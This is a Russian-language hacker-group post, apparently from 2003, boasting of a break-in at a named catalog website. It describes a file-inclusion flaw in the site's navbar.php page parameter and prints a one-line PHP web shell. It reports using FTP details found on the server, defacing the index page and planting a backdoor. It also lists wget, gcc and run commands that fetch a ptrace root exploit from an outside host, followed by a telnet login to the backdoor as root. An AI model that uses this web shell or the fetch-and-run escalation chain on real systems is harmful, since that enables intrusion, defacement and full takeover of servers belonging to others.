Расскажу же я вам о тех самых Пополнениях, что числятся в рядах одного из наших разделов (hacked), а именно более-менее подробно буду описывать Их.

[www.allyourcatalogs.com] – 15-16.11.2003 (ночь) >

DRM:

" … на сайте, проверив, промелькнувший в момент загрузки страницы, URL: [www.allyourcatalogs.com/navbar.php?page=index.inc ], попробовал подставить своё (определённо верное) значение в переменную $page. Результат:

[
Fatal error: Failed opening required '[БушЛох]' (include_path='.:/usr/share/pear') in /sites/icatalog/docroot/navbar.php on line 103
]

     Реакция на подобные строки одна – выполняю заготовленный скрипт на сайте жертвы.

:::cmd.php:::

<? passthru("$cmd"); ?>
 

Права (id) : uid=48(apache) gid=48(apache) groups=48(apache)

     На запись не хватает. Следующим этапом я предпочёл осмотреть содержимое, интересных по названию, файлов ... Дело длилось не долго ->  в одной из папок был найден test.php - не доработанный скрипт подключения к ФТП-серверу (RedHat Linux). Содержание:

$FTPserver = "64.49.223.39";
$FTPuser = "web";
$FTPpassword = "xxxxxxxxxxxxxxxxxxxxx"; // 21 знак
....

     Подключение. В момент представлена структура 64.49.223.39 (server1.icatalog.ws) сервера. Сразу же была изменена индексная страница и установлен backdoor, для подальшей эффективной работы на сервере.

Очевидной является последующая закачка эксплоита:

>wget -O /tmp/myptrace.c http://packetstormsecurity.nl/0304-exploits/myptrace.c;
>gcc -o /tmp/myptrace /tmp/myptrace.c;
>./myptrace;

И подключение к серверу (telnet server1.icatalog.ws 24876) в качестве root:

ID: uid=0(root) gid=0(root) groups=48(apache)

Последующие действия не оговариваются.
EnD...

Так это было...